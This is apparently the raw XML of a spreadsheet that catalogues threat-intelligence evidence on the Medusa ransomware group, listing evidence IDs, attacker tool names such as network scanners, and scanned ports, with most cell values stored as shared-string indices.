    <m/>
    <s v="htool"/>
    <s v="advanced IP scanner"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0069"/>
    <s v="netscan-pid"/>
    <s v="htool"/>
    <s v="Softperfect Netscan"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="medusa-eid0070"/>
    <m/>
    <s v="generic"/>
    <s v="scanned ports 23, 80, 115, 443, 1433, 3050, 3128, 3306, 3389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7A43D-0F5C-9C41-98FD-0322A1B7141F}" name="PivotTable6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6">
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="2">
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="5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p_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of eid_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889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F71" totalsRowShown="0" dataDxfId="6">
  <autoFilter ref="A1:F71" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
  <tableColumns count="6">
    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="5"/>
    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="4"/>
    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="3"/>
    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="2"/>
    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="1"/>
    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E}" name="ns_meta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5849-2682-F643-8842-EFF560F6FB5C}">
  <dimension ref="A1:F71"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="B69" sqref="B69"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="15.1640625" customWidth="1"/>
    <col min="2" max="3" width="21.5" customWidth="1"/>
    <col min="4" max="4" width="133.83203125" customWidth="1"/>
    <col min="5" max="5" width="49.83203125" customWidth="1"/>
    <col min="6" max="6" width="104.33203125" customWidth="1"/>
    <col min="7" max="7" width="147.1640625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3</v>
      </c>
      <c r="E1" t="s">
        <v>2</v>
      </c>
      <c r="F1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="2" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>77</v>
      </c>
      <c r="B2" s="1" t="s">
        <v>159</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>6</v>
      </c>
      <c r="E2" s="1"/>
      <c r="F2" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>78</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>159</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>8</v>
      </c>
      <c r="E3" s="1"/>
      <c r="F3" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>79</v>
      </c>
      <c r="B4" s="1"/>
      <c r="C4" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>9</v>
      </c>
      <c r="E4" s="1"/>
      <c r="F4" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="119" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>80</v>
      </c>
      <c r="B5" s="1"/>
      <c r="C5" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>10</v>
      </c>
      <c r="E5" s="1"/>
      <c r="F5" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>81</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>158</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>11</v>
      </c>
      <c r="E6" s="1"/>
      <c r="F6" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>82</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>154</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>12</v>
      </c>
      <c r="E7" s="1"/>
      <c r="F7" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>83</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>154</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>13</v>
      </c>
      <c r="E8" s="1"/>
      <c r="F8" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>84</v>
      </c>
      <c r="B9" s="1"/>
      <c r="C9" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>14</v>
      </c>
      <c r="E9" s="1"/>
      <c r="F9" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="10" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>85</v>
      </c>
      <c r="B10" s="1"/>
      <c r="C10" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>15</v>
      </c>
      <c r="E10" s="1"/>
      <c r="F10" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="11" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>86</v>
      </c>
      <c r="B11" s="1"/>
      <c r="C11" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>16</v>
      </c>
      <c r="E11" s="1"/>
      <c r="F11" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="12" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A12" s="1" t="s">
        <v>87</v>
      </c>
      <c r="B12" s="1"/>
      <c r="C12" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>17</v>
      </c>
      <c r="E12" s="1"/>
      <c r="F12" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>88</v>
      </c>
      <c r="B13" s="1"/>
      <c r="C13" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>18</v>
      </c>
      <c r="E13" s="1"/>
      <c r="F13" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A14" s="1" t="s">
        <v>89</v>
      </c>
      <c r="B14" s="1"/>
      <c r="C14" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E14" s="1"/>
      <c r="F14" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="15" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A15" s="1" t="s">
        <v>90</v>
      </c>
      <c r="B15" s="1"/>
      <c r="C15" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>20</v>
      </c>
      <c r="E15" s="1"/>
      <c r="F15" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A16" s="1" t="s">
        <v>91</v>
      </c>
      <c r="B16" s="1"/>
      <c r="C16" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>21</v>
      </c>
      <c r="E16" s="1"/>
      <c r="F16" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="17" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>92</v>
      </c>
      <c r="B17" s="1"/>
      <c r="C17" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>22</v>
      </c>
      <c r="E17" s="1"/>
      <c r="F17" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="18" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A18" s="1" t="s">
        <v>93</v>
      </c>
      <c r="B18" s="1"/>
      <c r="C18" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>23</v>
      </c>
      <c r="E18" s="1"/>
      <c r="F18" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="19" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>94</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>157</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>24</v>
      </c>
      <c r="E19" s="1"/>
      <c r="F19" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="20" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A20" s="1" t="s">
        <v>95</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>157</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>25</v>
      </c>
      <c r="E20" s="1"/>
      <c r="F20" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="119" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>96</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>157</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>26</v>
      </c>
      <c r="E21" s="1"/>
      <c r="F21" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>97</v>
      </c>
      <c r="B22" s="1"/>
      <c r="C22" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>27</v>
      </c>
      <c r="E22" s="1"/>
      <c r="F22" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="23" spans="1:6" ht="68" x14ac:dyDescent="0.2">
      <c r="A23" s="1" t="s">
        <v>98</v>
      </c>
      <c r="B23" s="1"/>
      <c r="C23" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>28</v>
      </c>
      <c r="E23" s="1"/>
      <c r="F23" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="24" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A24" s="1" t="s">
        <v>99</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>29</v>
      </c>
      <c r="E24" s="1"/>
      <c r="F24" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="25" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A25" s="1" t="s">
        <v>100</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D25" s="1" t="s">
        <v>30</v>
      </c>
      <c r="E25" s="1"/>
      <c r="F25" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="26" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A26" s="1" t="s">
        <v>101</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D26" s="1" t="s">
        <v>31</v>
      </c>
      <c r="E26" s="1"/>
      <c r="F26" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="27" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A27" s="1" t="s">
        <v>102</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D27" s="1" t="s">
        <v>32</v>
      </c>
      <c r="E27" s="1"/>
      <c r="F27" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="28" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A28" s="1" t="s">
        <v>103</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D28" s="1" t="s">
        <v>33</v>
      </c>
      <c r="E28" s="1"/>
      <c r="F28" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="29" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A29" s="1" t="s">
        <v>104</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D29" s="1" t="s">
        <v>34</v>
      </c>
      <c r="E29" s="1"/>
      <c r="F29" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="30" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A30" s="1" t="s">
        <v>105</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D30" s="1" t="s">
        <v>35</v>
      </c>
      <c r="E30" s="1"/>
      <c r="F30" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="31" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A31" s="1" t="s">
        <v>106</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D31" s="1" t="s">
        <v>36</v>
      </c>
      <c r="E31" s="1"/>
      <c r="F31" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="32" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A32" s="1" t="s">
        <v>107</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D32" s="1" t="s">
        <v>37</v>
      </c>
      <c r="E32" s="1"/>
      <c r="F32" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="33" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A33" s="1" t="s">
        <v>108</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D33" s="1" t="s">
        <v>38</v>
      </c>
      <c r="E33" s="1"/>
      <c r="F33" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="34" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A34" s="1" t="s">
        <v>109</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D34" s="1" t="s">
        <v>39</v>
      </c>
      <c r="E34" s="1"/>
      <c r="F34" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="35" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A35" s="1" t="s">
        <v>110</v>
      </c>
      <c r="B35" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D35" s="1" t="s">
        <v>40</v>
      </c>
      <c r="E35" s="1"/>
      <c r="F35" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="36" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A36" s="1" t="s">
        <v>111</v>
      </c>
      <c r="B36" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C36" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D36" s="1" t="s">
        <v>41</v>
      </c>
      <c r="E36" s="1"/>
      <c r="F36" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="37" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A37" s="1" t="s">
        <v>112</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>42</v>
      </c>
      <c r="E37" s="1"/>
      <c r="F37" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="38" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A38" s="1" t="s">
        <v>113</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C38" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D38" s="1" t="s">
        <v>43</v>
      </c>
      <c r="E38" s="1"/>
      <c r="F38" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="39" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A39" s="1" t="s">
        <v>114</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C39" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D39" s="1" t="s">
        <v>44</v>
      </c>
      <c r="E39" s="1"/>
      <c r="F39" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="40" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A40" s="1" t="s">
        <v>115</v>
      </c>
      <c r="B40" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C40" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D40" s="1" t="s">
        <v>45</v>
      </c>
      <c r="E40" s="1"/>
      <c r="F40" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="41" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A41" s="1" t="s">
        <v>116</v>
      </c>
      <c r="B41" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C41" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D41" s="1" t="s">
        <v>46</v>
      </c>
      <c r="E41" s="1"/>
      <c r="F41" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="42" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A42" s="1" t="s">
        <v>117</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D42" s="1" t="s">
        <v>47</v>
      </c>
      <c r="E42" s="1"/>
      <c r="F42" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="43" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A43" s="1" t="s">
        <v>118</v>
      </c>
      <c r="B43" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D43" s="1" t="s">
        <v>48</v>
      </c>
      <c r="E43" s="1"/>
      <c r="F43" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="44" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A44" s="1" t="s">
        <v>119</v>
      </c>
      <c r="B44" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D44" s="1" t="s">
        <v>49</v>
      </c>
      <c r="E44" s="1"/>
      <c r="F44" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="45" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A45" s="1" t="s">
        <v>120</v>
      </c>
      <c r="B45" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D45" s="1" t="s">
        <v>50</v>
      </c>
      <c r="E45" s="1"/>
      <c r="F45" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="46" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A46" s="1" t="s">
        <v>121</v>
      </c>
      <c r="B46" s="1" t="s">
        <v>155</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D46" s="1" t="s">
        <v>51</v>
      </c>
      <c r="E46" s="1"/>
      <c r="F46" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="47" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A47" s="1" t="s">
        <v>122</v>
      </c>
      <c r="B47" s="1" t="s">
        <v>154</v>
      </c>
      <c r="C47" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D47" s="1" t="s">
        <v>52</v>
      </c>
      <c r="E47" s="1"/>
      <c r="F47" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="48" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A48" s="1" t="s">
        <v>123</v>
      </c>
      <c r="B48" s="1" t="s">
        <v>154</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D48" s="1" t="s">
        <v>53</v>
      </c>
      <c r="E48" s="1"/>
      <c r="F48" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="49" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A49" s="1" t="s">
        <v>124</v>
      </c>
      <c r="B49" s="1" t="s">
        <v>154</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D49" s="1" t="s">
        <v>54</v>
      </c>
      <c r="E49" s="1"/>
      <c r="F49" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="50" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A50" s="1" t="s">
        <v>125</v>
      </c>
      <c r="B50" s="1" t="s">
        <v>154</v>
      </c>
      <c r="C50" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D50" s="1" t="s">
        <v>55</v>
      </c>
      <c r="E50" s="1"/>
      <c r="F50" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="51" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A51" s="1" t="s">
        <v>126</v>
      </c>
      <c r="B51" s="1" t="s">
        <v>154</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D51" s="1" t="s">
        <v>56</v>
      </c>
      <c r="E51" s="1"/>
      <c r="F51" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="52" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A52" s="1" t="s">
        <v>127</v>
      </c>
      <c r="B52" s="1" t="s">
        <v>154</v>
      </c>
      <c r="C52" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D52" s="1" t="s">
        <v>57</v>
      </c>
      <c r="E52" s="1"/>
      <c r="F52" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="53" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A53" s="1" t="s">
        <v>128</v>
      </c>
      <c r="B53" s="1" t="s">
        <v>154</v>
      </c>
      <c r="C53" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D53" s="1" t="s">
        <v>58</v>
      </c>
      <c r="E53" s="1"/>
      <c r="F53" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="54" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A54" s="1" t="s">
        <v>129</v>
      </c>
      <c r="B54" s="1" t="s">
        <v>154</v>
      </c>
      <c r="C54" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D54" s="1" t="s">
        <v>59</v>
      </c>
      <c r="E54" s="1"/>
      <c r="F54" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="55" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A55" s="1" t="s">
        <v>130</v>
      </c>
      <c r="B55" s="1" t="s">
        <v>154</v>
      </c>
      <c r="C55" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D55" s="1" t="s">
        <v>60</v>
      </c>
      <c r="E55" s="1"/>
      <c r="F55" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="56" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A56" s="1" t="s">
        <v>131</v>
      </c>
      <c r="B56" s="1"/>
      <c r="C56" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D56" s="1" t="s">
        <v>61</v>
      </c>
      <c r="E56" s="1"/>
      <c r="F56" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="57" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A57" s="1" t="s">
        <v>132</v>
      </c>
      <c r="B57" s="1" t="s">
        <v>153</v>
      </c>
      <c r="C57" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D57" s="1" t="s">
        <v>62</v>
      </c>
      <c r="E57" s="1"/>
      <c r="F57" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="58" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A58" s="1" t="s">
        <v>133</v>
      </c>
      <c r="B58" s="1"/>
      <c r="C58" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D58" s="1" t="s">
        <v>63</v>
      </c>
      <c r="E58" s="1"/>
      <c r="F58" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="59" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A59" s="1" t="s">
        <v>134</v>
      </c>
      <c r="B59" s="1" t="s">
        <v>152</v>
      </c>
      <c r="C59" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D59" s="1" t="s">
        <v>64</v>
      </c>
      <c r="E59" s="1"/>
      <c r="F59" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="60" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A60" s="1" t="s">
        <v>135</v>
      </c>
      <c r="B60" s="1" t="s">
        <v>152</v>
      </c>
      <c r="C60" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D60" s="1" t="s">
        <v>65</v>
      </c>
      <c r="E60" s="1"/>
      <c r="F60" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="61" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A61" s="1" t="s">
        <v>136</v>
      </c>
      <c r="B61" s="1"/>
      <c r="C61" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D61" s="1" t="s">
        <v>66</v>
      </c>
      <c r="E61" s="1"/>
      <c r="F61" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="62" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A62" s="1" t="s">
        <v>137</v>
      </c>
      <c r="B62" s="1" t="s">
        <v>151</v>
      </c>
      <c r="C62" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D62" s="1" t="s">
        <v>67</v>
      </c>
      <c r="E62" s="1"/>
      <c r="F62" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="63" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A63" s="1" t="s">
        <v>138</v>
      </c>
      <c r="B63" s="1" t="s">
        <v>151</v>
      </c>
      <c r="C63" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D63" s="1" t="s">
        <v>68</v>
      </c>
      <c r="E63" s="1"/>
      <c r="F63" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="64" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A64" s="1" t="s">
        <v>139</v>
      </c>
      <c r="B64" s="1"/>
      <c r="C64" s="1" t="s">
        <v>147</v>
      </c>
      <c r="D64" s="1" t="s">
        <v>69</v>
      </c>
      <c r="E64" s="1"/>
      <c r="F64" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="65" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A65" s="1" t="s">
        <v>140</v>
      </c>
      <c r="B65" s="1" t="s">
        <v>165</v>
      </c>
      <c r="C65" s="1" t="s">
        <v>148</v>
      </c>
      <c r="D65" s="1" t="s">
        <v>70</v>
      </c>
      <c r="E65" s="1"/>
      <c r="F65" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="66" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A66" s="1" t="s">
        <v>141</v>
      </c>
      <c r="B66" s="1"/>
      <c r="C66" s="1" t="s">
        <v>148</v>
      </c>
      <c r="D66" s="1" t="s">
        <v>71</v>
      </c>
      <c r="E66" s="1"/>
      <c r="F66" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="67" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A67" s="1" t="s">
        <v>142</v>
      </c>
      <c r="B67" s="1" t="s">
        <v>156</v>
      </c>
      <c r="C67" s="1" t="s">
        <v>148</v>
      </c>
      <c r="D67" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E67" s="1"/>
      <c r="F67" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="68" spans="1:6" ht="34" x14ac:dyDescent="0.2">
